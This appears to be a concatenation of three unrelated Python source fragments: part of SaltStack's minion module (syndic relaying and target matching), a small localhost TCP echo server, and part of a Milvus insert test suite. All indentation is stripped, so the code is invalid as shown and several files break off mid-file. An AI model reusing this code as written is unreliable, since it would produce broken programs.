# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
user=data.get('user', ''),
**kwargs)
def _setsockopts(self):
# no filters for syndication masters, unless we want to maintain a
# list of all connected minions and update the filter
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self._set_ipv4only()
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
loop_interval = int(self.opts['loop_interval'])
self._fire_master_syndic_start()
while True:
try:
socks = dict(self.poller.poll(loop_interval * 1000))
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
except zmq.ZMQError:
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self._init_context_and_poller()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# register the event sub to the poller
self.poller.register(self.local.event.sub)
# Start with the publish socket
# Share the poller with the event object
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None and \
self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
jdict['master_id'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~60s attempting to re-auth
with the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
def __init__(self, opts):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# create all of the syndics you need
self.master_syndics = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self.master_syndics[master] = {'opts': s_opts,
'auth_wait': s_opts['acceptance_wait_time'],
'dead_until': 0}
self._connect_to_master(master)
# TODO: do we need all of this?
def _connect_to_master(self, master):
'''
Attempt to connect to master, including back-off for each one
return boolean of whether you connected or not
'''
if master not in self.master_syndics:
log.error('Unable to connect to {0}, not in the list of masters'.format(master))
return False
minion = self.master_syndics[master]
# if we need to be dead for a while, stay that way
if minion['dead_until'] > time.time():
return False
if time.time() - minion['auth_wait'] > minion.get('last', 0):
try:
t_minion = Syndic(minion['opts'],
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
)
self.master_syndics[master]['syndic'] = t_minion
self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
self.master_syndics[master]['dead_until'] = 0
return True
except SaltClientError:
log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
# re-use auth-wait as backoff for syndic
minion['dead_until'] = time.time() + minion['auth_wait']
if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
minion['auth_wait'] += self.opts['acceptance_wait_time']
return False
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_dict in self.iter_master_options(master_id):
if 'syndic' not in syndic_dict:
continue
if syndic_dict['dead_until'] > time.time():
log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master_id))
continue
try:
getattr(syndic_dict['syndic'], func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
# re-use auth-wait as backoff for syndic
syndic_dict['dead_until'] = time.time() + syndic_dict['auth_wait']
if syndic_dict['auth_wait'] < self.opts['acceptance_wait_time_max']:
syndic_dict['auth_wait'] += self.opts['acceptance_wait_time']
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self.master_syndics.keys())
shuffle(masters)
if master_id not in self.master_syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self.master_syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# Share the poller with the event object
self.poller = self.local.event.poller
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
# check all of your master_syndics, have them do their thing
for master_id, syndic_dict in self.master_syndics.items():
# if not connected, lets try
if 'generator' not in syndic_dict:
# if we couldn't connect, lets try later
if not self._connect_to_master(master_id):
continue
next(syndic_dict['generator'])
# events
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic')},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), master_id=jid_ret.get('__master_id__'))
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, str):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
self.functions = salt.loader.minion_mods(self.opts)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.functions, self.returners, self.function_errors = self._load_modules()
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
funcs=self.functions
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
tcp_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import threading
bind_ip = "127.0.0.1"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print ("[*] Listening on %s:%d" % (bind_ip,bind_port))
# クライアントからの接続を処理するスレッド
def handle_client(client_socket):
# クライアントが送信してきたデータを表示
request = client_socket.recv(1024)
print ("[*] Received: %s" % request)
# パケットの返送
client_socket.send("ACK!".encode('utf-8'))
client_socket.close()
while True:
client,addr = server.accept()
print ("[*] Accepted connection from: %s:%d" % (addr[0],addr[1]))
# 受信データを処理するスレッドの起動
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
default_single_query = {
"data": ut.gen_vectors(1, ut.default_dim),
"anns_field": ut.default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": 10,
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in ut.index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = ut.default_segment_row_limit + 1
result = connect.insert(collection, ut.gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
